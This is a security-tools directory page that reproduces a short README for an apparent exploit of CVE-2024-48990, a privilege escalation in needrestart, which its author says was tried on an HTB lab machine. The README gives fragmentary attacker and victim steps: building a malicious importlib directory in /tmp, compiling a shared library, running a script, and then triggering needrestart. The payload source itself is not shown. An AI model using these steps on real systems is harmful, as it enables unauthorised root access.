Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-48990 — i tried this in Conversor HTB machine | Kitploit
Tools/GitHubGitHub/0x3bs/cve-2024-48990
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingPayload DevelopmentBinary Exploitation
GitHub0x3bs/cve-2024-48990

CVE-2024-48990

i tried this in Conversor HTB machine

View Repository
18 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-48990

hello this is 0x3bs

In victim machine:

root@kitploit:~
set -e
cd /tmp

# 1. Create the malicious module directory structure
mkdir -p malicious/importlib

in attacker machine

to compile lib.c in attacker machine :

root@kitploit:~
gcc -shared -fPIC -o exp.so lib.c 

and in vivtim machine :

in /tmp

root@kitploit:~
chmod +x run.sh

in /tmp/malicious/importlib :

root@kitploit:~
chmod +x exp.so

./exp.so

# try to run it after run 'run.sh' if it didn't work

and in /tmp

root@kitploit:~
./run.sh

and in another sesion run the needrestart

remember >> the exp.so must be in /tmp/malicious/importlib

Download Tool